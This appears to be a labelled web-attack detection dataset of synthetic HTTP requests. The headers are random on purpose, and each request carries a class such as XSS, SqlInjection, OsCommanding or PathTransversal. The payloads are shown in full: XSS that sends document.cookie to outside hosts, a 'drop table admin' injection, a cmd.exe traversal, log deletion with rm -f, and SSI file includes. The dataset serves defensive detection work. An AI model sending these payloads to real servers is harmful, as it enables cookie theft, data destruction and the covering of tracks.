Transfer-Encoding: compress
Upgrade: nhla/4.5
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45829
Start - Id: 37779
class: LdapInjection
GET /oQZc_h/e8yn-l7tzsV/o8e/pj@xSVnpvOlwh/eoz.2UxpUJOJ0UB/metavSin2qmninlTj/sfOI0ZJdSthCmW/lc@HF/joreeOgectndhasss7l/GJ6xPUO1openr/ft2BZRSG1XaYYJL3/DAitnhaaca5f.asp?gmyrqnefQs4on=%29++%28++%7C+++%28++cn%3D*o+%27brien*%29%28mail+%3D*o++%27brien*++%29&n_7XNKFOD=6554839864 HTTP/1.0
Host: 44.225.142.165
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate, gzip
Accept-Language: sasn-n, F-t7Ohun;q=0.5, fotLHwa6-dtnha, riS-bbud
Cache-Control: max-age=2732
Client-ip: 233.194.90.144
Cookie: detCrlye=mre;4aoccnt=506276;RvIKDo=4
Cookie2: $Version="7"
Date: Thu, 11 Nov 04 24:50:42 GMT
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Tue, 30 Sep 08 06:09:32 CET
If-Match: "0XP@KyfGSm2lNB4gtU"
If-None-Match: *
If-Range: "hRjFaauAC5PB2Vogk"
Max-Forwards: 9287
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: mbuu ATnc3N=emJnntNr
Range: 942-,92-,07-63
Referer: /esyltm/YmrLice/2ihtk.dll
TE: trailers,trailers,chunked;q=0.5
Trailer: Range
User-Agent: s.s0EU http://www.Oso3t.cz
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 3.2 www.dsrs.js
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 326 72.4.51.119 "ezthaspMb" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37779
Start - Id: 46570
class: XSS
GET /nyooqne2smbk/lt90asthDatfgstoIdte/69otp/nwpIi27oVO79Hw-TzLb/orA.9OFKAHwY-qGIPZbe/WYxUstyleWyzWW/oe@sTzzZvLbaq0/xlnw/wbhr/l3K2.vbNcd@/3de7ohb7h/r9v7Rzc5D.bin?ahe=Uoslsoee&nhlr7a1mqe3ui=e6tttdnan%7Ch0yy&o1yio8tuuat=e1grt5greeit-fo&v5oEorrld9fd=Msuq+n&asKHtiMy7tni5=law&eA8BpTldnu1a=5&1E5E5qqh=i%409&hUstro=+ioe%7EeoYcieP&ewmse6r=ots2lwd7eautr&nSyj=st&areesl=08249384 HTTP/1.0
Host: www.5ttton0.fr:80
Connection: eiirrbri
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: deest6oI-eeohe, enlatqps-raiea, swb-t4e3
Cache-Control: no-cache
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Date: Fri, 05 Mar 04 08:30:12 GMT
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: y5eMtNi=arEeii
If-Modified-Since: Fri, 21 Sep 07 08:57:44 UTC
If-Unmodified-Since: Tue, 07 Dec 04 19:32:17 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 10 12:20:14 GMT
Max-Forwards: 5
MIME-Version: 3.9
Pragma: q1we='mludrnf'
Authorization: Digest realm
Range: 70-
Referer: http://www.nod3G.biz/0dwsojlc/hano/gsotn.cfm
TE: trailers,gzip,chunked;q=0.7
Trailer: If-Match
User-Agent: <div    onmouseover="     [window.open('http://17.140.186.5/ol.php'+document.cookie);]    " >
UA-OS: Win98
UA-Pixels: 5605x1554
Via: 1.5 2.25.31.149, 9.3 65.91.116.162, 1.1 18.119.99.179:9
Transfer-Encoding: identity
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46570
Start - Id: 39311
class: SSI
GET /tpwegoip/o_/TrOenUoTguIl8e2oueqz/nk68jlsmzaIw7Luanq/20qducL46vbqno8.cfm?idy=%3C%21--%23email+fromhost%3D%22www.snhehk.com%22+tohost%3D%22mailbox.osy7.com%22+message%3D%22Nua1a+taanwt+xn+icmna%22+fromaddress%3D%22iet3ed.com%22+toaddress%3D%22humy.hr.com%22+subject%3D%226wt%22+sender%3D%22slhm.com%22+replyto%3D%22euuvo.com%22+cc%3D%22ai7%22+inreplyto%3D%22tA+4ewi+shnpyz%22+id%3D%22ReryImail%22+--%3E&edble=27 HTTP/1.1
Host: 86.65.128.78:80
Connection: yatcpops
Accept: video/quicktime;q=0.0
Accept-Charset: iso-8859-3, isiri-3342, euc-cn;q=0.8, euc-tw, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.124.56.90
Cookie: mUNen5=R(o9;saRpAqm=al
Cookie2: $Version="93"
Date: Sat, 26 Sep 09 10:26:53 GMT
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Sat, 12 Apr 08 05:09:04 CET
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Tue, 12 Jun 07 08:00:33 CET
Max-Forwards: 23
MIME-Version: 8.9
Pragma: msaosext='ssynvaa'
Proxy-Authorization: Basic YTNzRmljdDpuaWVobHk0cA==
Authorization: Basic QWRpOG1lODphNW1Y
Range: 326-,2201-0740,2-99478
Referer: http://www.jtomuuul.ch/rea3wat/aphf/ma4iyd/u9SgddU/amada6.doc
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (compatible; Konqueror/9.7; Linux i386; jaD9u)
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: identity
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39311
Start - Id: 36089
class: PathTransversal
GET /xWHnNor71uE.g8@0xH/awtt2G/gIhsAd/sO6PywVl.asmx?sassnsero=eOz%2BzAEttiyaDm1&dLTiframeeCIKX=79584518&or=tnv1ttsec1+cin&p2ulaeaotDpVri=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&HWeyu=eqtal%5CPew6e&systemErhtaccesnullpnph-dJ=2857&UeYertltd=+t&Q_kBFG=ys4oilb&lW9FiE=7638436160&QLPTrwinntjqa5_L=1 HTTP/1.1
Host: www.etftHt.de:90
Connection: ceVaoher
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: metf-aoislna
Cache-Control: no-transform
Client-ip: 50.135.3.140
Cookie: atmule=DN ;tfo5ru2hSitneos=486720;8nigochrssr=27329713;qRkUS.u0a=ieAhe
Cookie2: $Version="6"
Date: Tue, 10 Apr 07 07:24:32 CET
ETag: W/"vj6-gIvwcOr79OE6"
Expect: urhmnt=re1d
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: http://6mtgha.net/snsspn/zoaea/c7oaes/otnz.swf
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 4.1; lb-rd; rv:8.0.4) Gecko/90394872
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5584x598
Via: 2.7 101.14.29.209:9
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 0275337100162
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36089
Start - Id: 42596
class: SqlInjection
GET /y5yda5srra/7tx2oawyhacea3e/emc7iwnxw/ioqenm.png?heynRfua=TtmrouKhiy&MCUSp=lfBik7u77&Psj7a=1uD2EL.OISC&icstatfeezSej=juoct2s&E1eeviwbe=selectncn&eKlmsv=chairs%27++++UNION+SELECT++w6o4ia+++++FROM++++dba_users+WHERE++name+like++++%27%2525&Na=taig+toocdilike%3AhFnmby&Se=i8ro4Mser&fC_qGNFEfC0=%3DrNSa HTTP/1.1
Host: www.iIlitui.it:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: th0c9avb-es77oLt;q=0.6, ekle-Iseste;q=0.2
Client-ip: 186.49.71.187
Cookie2: $Version="5"
Date: Sat, 18 Dec 04 05:19:10 UTC
ETag: W/"5KIIbf4_n@3BfW.2kH"
From: tehAicae@isHota.com
If-Modified-Since: Sun, 19 Nov 06 21:15:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0680
Referer: http://www.dpkmyN4s.it/Adeoo/iealinir.mspx
TE: deflate;q=0.2,chunked;q=0.9
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 7.5; ta-7i; rv:6.8.0) Gecko/83834301
UA-Disp: 478,8453,32

null

End - Id: 42596
Start - Id: 36430
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 36.84.74.59
Connection: keep-alive
Accept-Charset: iso-8859-3, windows-1252;q=0.3
Accept-Encoding: 
Accept-Language: rkoasa4-i;q=0.9, tarwr-ofe;q=0.6, 6n2ihdhp-suanekr
Date: Sun, 30 Oct 05 08:21:14 UTC
ETag: "RKPYU8tNuJue3c_"
If-Modified-Since: Thu, 30 Apr 09 13:10:24 CET
If-Unmodified-Since: Fri, 03 Sep 04 18:32:09 UTC
Max-Forwards: 13
Referer: http://www.eshopgb.org/eiltOehI/ntet.jpg
User-Agent: gbaatl/7.2.4.7
Transfer-Encoding: heUo; qzNau=Cdeo

null

End - Id: 36430
Start - Id: 41629
class: SqlInjection
GET /uxesneaUuno/a08b2VaJCmochauSpdelete/t1_@tR72tMcBDttx/doutketfor8aggzrhzyt/dD5J9LZ/pgw1oi2rtygQon/CmservicesXcV5m5/entceooSibp/rieaiGnaa/QiframerDr8f.mdb?6Ta9ixe=slike&eeunatwk3xt0p=69561744&..6jzlpRZsb=tjl&ot=iidp&HIclib5oWZ6access_log=djlevosefplooars&eeretSoontnn=poydCa1dinr&BKXNEW.bO=bag+r&D5RNta7=%5B26lHen1noge&y7xgeS7o9t=%27%3B+++++drop++table+admin&iansndcgmlo=ntiidteeop HTTP/1.0
Host: 55.68.176.182
Connection: ftIrd
Accept: audio/x-wav;q=0.0
Accept-Charset: euc-tw;q=0.8, windows-1250;q=0.5, us-ascii;q=0.7, koi8-r, x-mac-chinesesimp
Accept-Encoding: *;q=0.1
Accept-Language: 4umE6-satrelw;q=0.8
Cache-Control: max-age=645
Client-ip: 16.110.90.41
Cookie: abemwsqn=ee1noofnne6lz2I;luaa3cmEa=os4;nriph5ewfalft0=AseiebieEH3Mwaasc;lnw0ids=oma
Cookie2: $Version="003"
Date: Sun, 03 Feb 08 17:24:17 UTC
ETag: W/"LQFO4hCK5wqIuHc"
Expect: dSei2edr=aNexTn
From: enlbuaah@iDob1m.fr
If-Modified-Since: Mon, 23 Apr 07 11:46:14 CET
If-Unmodified-Since: Tue, 07 Sep 04 15:14:04 UTC
If-Match: "ANlUb@68rpGQSJn"
If-None-Match: *
If-Range: Tue, 18 Apr 06 24:05:08 GMT
Max-Forwards: 72
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: Digest uri=http://www.Tmda.net/rr4tee.pdf
Range: 53962-110288
Referer: /btmsr/pese/endt/dir0lm.php4
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/8.9 (X11; U; Linux i586 6.7; nh-eU; rv:2.4.1) Gecko/97462600
UA-CPU: Sparc
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: compress
Upgrade: olC/3.6, enno3a/9.1, rEwh/3.6, uetIa/1.1
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 475701883207700445
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41629
Start - Id: 35902
class: XPathInjection
POST /e9octotaTjss6nonqqt.js? HTTP/1.1
Content-Length: 277
Content-Language: odausil,s
Content-Encoding: gzip
Content-Location: http://www.ooas.it/h6onspc/mjAaioi/azsopFg.bin
Content-MD5: YzNkeWJ5bzRwZ2lzU3luZw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 29 Oct 08 08:17:03 GMT
Host: 214.221.119.138
Connection: neIdnfnn
Accept: */*
Accept-Encoding: ryar'    or   count(  path/child::node()[position(    )=((i  +j   +  k  +  l+    1)]   |     path/child::*()[position()=(k+1)])=1     or 'sh'   ='    refeTa'   or
Accept-Language: *;q=0.5
Cache-Control: max-stale=0945
Referer: /sitAudhd.rar
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 2.1; na-sb; rv:1.7.4) Gecko/03536145
X-Serial-Number: 8167803059688570631

roftkncotesae=tpeDSmOFvHCq&aun=q] hrw$ty&TaheImusyanrl=4571759&0JNxWfzWOThf=58508&vy=eupdateilbo nnv/3emne@htpassbw&vcoilshs=aa@Wd2fa&iRdewsOa=35NrEg&nz=2681119&btuLgoi=iibv-Gtt&UinputTnYlwVzXZ=01304&aa4ttrl=sbEB&takacuA=t7S@O2uL9&rea=728106&e8hs5cfokv=lUh1cVKT.YpH

End - Id: 35902
Start - Id: 47709
class: XSS
GET /bm1AJku5qWj-/THh_jrFKNM7tk/TlltladewcprcLgad.jsp?G_Ky2AMV8k.autoexec=iDmlgBKDkzwQ&hsjni1seteEwo=294368&harcipluqern=5euvhqycK&7iAn6rmSh=080135&wnzsnh3eN=%3Cdiv+style+++%3D+++%22+background-image%3A++++url%28javascript%3A++++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Foloner.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++%22++%3E&tmla5s=nuat8Ra&9OcfD3xF9https=hRwv&iTvhle=140823&x8oe@FOR-Drsock_stream=%7Er HTTP/1.1
Host: 64.8.15.190:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ynr9-hq, iea-2eie
Cache-Control: max-age=6207
Client-ip: 182.94.84.233
Cookie: arcrheeo=475627;knslh4iaTslntaa=oa7evwSuDrCde6;eno8io=851078;A_XlQ2sbQG=mStw_hFdyQj9
Cookie2: $Version="88"
Date: Thu, 27 Sep 07 24:30:46 CET
ETag: "SJrP0lOLvAUr@LC"
Expect: eAkt=es3Stmno
From: saib3@Tioc.com
If-Modified-Since: Thu, 11 Jan 07 13:05:34 UTC
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "jnEpRFfbpJxztvo-zN_6"
If-None-Match: *
If-Range: "a4D8OMC2.e9SlXrsbi.-"
Max-Forwards: 1149
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic MnphejppZTJ4aWU=
Range: 37-9480,573294-46248,0850-768
Referer: http://www.csrmlHm.uk/gp2r2o/ennieeos/nDrskTo/tdtxOn.js
TE: chunked,trailers,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/8.6 (compatible; MSIE 5.0; Windows NT; znss0p; etnh)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: FTP/2.4 www.oEmrmN.html, FTP/0.8 13.28.77.253
Transfer-Encoding: o8pah; ieeir=roso9a
Upgrade: Oshni/6.9, edt/9.6, HSilt/8.8, 5jtk/7.8
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47709
Start - Id: 43003
class: OsCommanding
PUT /o-MssZMSth/wnwske1bbuarp/oeel56men1/7A.ME@/05/eeVTx/50WbM2pZnlHAufY.shtml? HTTP/1.0
Content-Length: 288
Content-Language: lkeilm,iisranyN,a0Ifxr
Content-Encoding: identity
Content-Location: http://www.6Moe.be/zizn2e/tna6/eetnlg/eS8po8n.msf
Content-MD5: T21lYWhzaWZlbmVlbnQ1RA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Mar 05 15:20:13 UTC
Last-Modified: Wed, 16 May 07 11:24:09 GMT
Host: 130.181.223.223
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity, compress, compress, deflate;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.1
Cache-Control: min-fresh=15772
Client-ip: 110.134.30.79
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="63"
Date: Thu, 10 Aug 06 14:01:27 CET
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
From: nerhOvTl@7taord7ae.gov
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-Unmodified-Since: Tue, 25 Sep 07 20:15:46 CET
If-Match: "OOFnq.Yf-QFnzQzCt5Qx"
If-None-Match: *
If-Range: Wed, 11 Jan 06 01:45:27 UTC
Max-Forwards: 1164
Pragma: I=e9
Authorization: Digest username="alvtna"
Referer: /ihMe/ewecesi/hihj/oei7.asmx
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: sgrimaoBa0
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

TeDitpae3cehe=iae7urasurioi7bee&iecd9TBeghsuh=6712&ilpasnnrnRssdd=te)Dbdoith9&l4bsi8eoea=3050&WGSeAzn-=4&soewxe=72saOons&aayuIe=9347&thntHeUslna=D&neMir1ROddeea=9i0a&TI8Eoei=eHbvadiZLO&wrhfuc8eion=-nwi&toa4ta=%0arm  -f    /var/log/httpd/access_log     ;&eelae=73266&leta9h=2

End - Id: 43003
Start - Id: 45915
class: PathTransversal
GET /9vkryIBjwS..DGJamj/VAlXJ/tn17LuhMxwfHpGyKqu6A/Odcs.bin?iesbultanl=2&it1dka2i2uG9=t4hinsertYcv&X7p.metad=x&ctrscmln=o1x&tCse=wfofvxt&se=qhnetjss&giendbseass=f%3A%5Cwinnt%5Cboot.ini&dtoabfehpio=enROhusf0Ml&ssEUirttof=412550&eieosrNea=6699195 HTTP/1.1
Host: www.hCaeeuUt.gov
Connection: close
Accept: */*
Accept-Charset: windows-1250, windows-874, iso-8859-4;q=0.9, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 90.133.156.2
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="230"
Date: Mon, 22 Jun 09 22:54:30 CET
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Mon, 24 Jul 06 14:41:11 CET
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: "uNs44YLwif8QZFBm"
If-None-Match: "x4UZPb7.Tnqd-Ny1v"
If-Range: *
Max-Forwards: 3049
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: NTLM MnQybG5hMkN0c3JrbE9lZXJzc3VlaGJ0NWFzNWRlTmxtMmhheWllZ25ub2E=
Range: -106180,0973-,3598-
Referer: http://btkfu.it/agekue/gsllDatu/dosn/emeStwia/ta7ll1en.cgi
TE: trailers
Trailer: TE
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 5.6; ta-tE; rv:0.3.5) Gecko/09832924
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/3.4 www.r9rld09u.htm, 2.0 www.giOe.tiff
Transfer-Encoding: gzip
Upgrade: dhvol/0.8, Pde/4.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45915
Start - Id: 38032
class: LdapInjection
GET /aeye/eeM5eebuwe9Gos/Dqdx6On0Z/otisveasfs/Zp@Lts@WNNdimg/Heval/21vF2B@-0@lHTw2/hK/n-3v8R./5X0zsiDF9@iTwCV@g/nibDocmnaaaut.asp?tnld=551213&2so=9&oddaoptdSc=+%5Da&ntSouirhvezxp9a=%29++%28+++%7C%28++++cn%3D*o++%27brien*++++%29%28mail++++%3D*o+++%27brien*++++%29&eahce=s%3Dnrr+iy&at8=amllvY&wa4ydaabTpu=25139&rwTatrnie=aiLf&3e3zfmta=nuuwxlwxJPF&hh6ss9oamgotocA=1929450847 HTTP/1.1
Host: 248.3.176.106:80
Connection: close
Accept: audio/*, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=523
Client-ip: 234.101.177.2
Cookie: hbha=iQjJ9@pBUn;iccfj=2591250;Zs0childN7=a ee;Isteuc8sfftcweF=andnoa;Sanlb=nNiA5l?connect2torr
Cookie2: $Version="67"
Date: Sun, 01 Jul 07 20:34:01 UTC
ETag: W/"hJ9vUmp.@v3Mr.ewG7Hg"
Expect: 100-continue
From: an0sEp@ayaad.uk
If-Modified-Since: Thu, 23 Sep 04 14:49:11 UTC
If-Unmodified-Since: Thu, 24 Sep 09 20:25:44 UTC
If-Match: "BRJCw96kieF7Xah"
If-None-Match: "ULRyrVELRuEPC5Ul56-k"
If-Range: Wed, 18 Jul 07 03:19:48 GMT
Max-Forwards: 6
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ns6mf r0kt=b8art
Authorization: Basic dXJlNThwaTplYXJuaWM=
Range: 67-6,809162-
Referer: /tttpsin/oolilyd.dll
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: rHMehS/5.5.6
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 427x816
Via: 4.0 www.sh3seq.gif, 3.0 www.ageeaWiO.html, FTP/4.6 52.36.212.119
Transfer-Encoding: rErp
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 684 151.9.243.38 "piufAer70OehrhadSaho" "Sun, 23 Jul 06 03:35:28 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38032
Start - Id: 37854
class: LdapInjection
GET /o4KhK/Bn.Ky.gif?ieajcUatts=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 200.246.167.40
Connection: keep-alive
Accept: application/*;q=0.4, video/*;q=0.5, text/xml;q=0.8
Accept-Charset: windows-1251, x-mac-korean;q=0.5
Accept-Encoding: *
Accept-Language: cfssswoe-ig;q=0.8, m-e
Cache-Control: no-store
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Sat, 01 Dec 07 15:55:30 CET
ETag: "5zNxKaSEcACZS8Il5w"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Thu, 25 Mar 04 18:39:44 GMT
If-Unmodified-Since: Sat, 08 Sep 07 23:54:50 UTC
If-Match: "yiSLxYUgGsv-ITzW"
If-None-Match: "TMovokovDB5iACx8bKIz"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: tadSq tnPeehL=5whgdoh2
Authorization: shsawf 9kNre=eHyvsun6
Range: 853418-,-430
Referer: /sio6nc/ziu5I/FenitOct.cfm
TE: trailers
Trailer: Referer
User-Agent: drdaeiedeeamuhoy
UA-CPU: x86
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2946x657
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: identity
Upgrade: uoE/5.1, iitjl/6.0
Warning: 054 61.133.144.15 "eokcuPnceergseehto" 
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37854
Start - Id: 40415
class: SSI
PUT /BDzICttvHy_Iiframes/afeMFvASZgcch.mspx? HTTP/1.0
Content-Length: 114
Content-Language: 72,hLlemm
Content-Encoding: identity
Content-Location: /ire7b3j/keln8i/d4j4.msf
Content-MD5: YWZvb29jNWF2bmhldWJyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 15:51:32 UTC
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: www.kesevrss.de:0
Connection: 7uyIt7e
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate;q=0.8, deflate
Accept-Language: *
Cache-Control: max-stale=49462
Client-ip: 21.209.58.212
Cookie: nmmstis=drbgeeda oas;blete=83;tt=tdcymedRtaLeZqt;1eet=n3HvV;rordmrl6n7reqea=wed4alll;tnxAsNareie=eeo~C
Cookie2: $Version="051"
Date: Thu, 14 Aug 08 04:31:40 GMT
ETag: "I_-yW92HFKbHxitO0Z"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 12 Jan 06 15:30:47 CET
If-Unmodified-Since: Sat, 25 Nov 06 05:35:55 UTC
If-Match: *
If-None-Match: "pHlSoQiWcRBXr@k_NI"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 8
MIME-Version: 6.8
Pragma: Die='6to'
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: 2-71,25-834520
Referer: /SaAp.wav
TE: trailers,chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/8.8 (X11; U; Open BSD i386 9.9; fn-eP; rv:9.9.6) Gecko/09657106
UA-CPU: 68000
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5480x145
Via: 2.4 www.nhAr8.shtml:82, 0.7 230.39.50.108, 3.9 www.ior8ds.gif
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 717 108.5.228.232 "euhD8Tr" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

replaceformwgZe=67d3i%taiw &05fdolzttisbo=<!--#include   virtual="c:\winnt\system.ini"   -->

End - Id: 40415
Start - Id: 42234
class: SqlInjection
GET /oRMosjAecVjWk/EC/5XQ8iLjfxp_binY4yY3/neAuRwlI.html?advgtCecaetpmue=k&da=+++++OR+++2+++%3E+1&setGkrUresbreas=3SW3gtMFp HTTP/1.1
Host: www.ivdcvn.be:170
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-9;q=0.8, windows-1255;q=0.0, windows-1257;q=0.7, iso-2022-kr
Accept-Encoding: 
Accept-Language: OecY-lsso, fyietsh-setpeiit;q=0.5, haiIret-h;q=0.7
Cache-Control: oh='lb14ean'
Client-ip: 25.90.218.25
Cookie: zhmXoioufhe=ounO=coaccept;qeasl=o;gsvaabsenhie6oE=r)pq 
Cookie2: $Version="00"
Date: Thu, 02 Aug 07 16:41:28 CET
ETag: W/"tbUtlhiPLZRVIV-SX.zT"
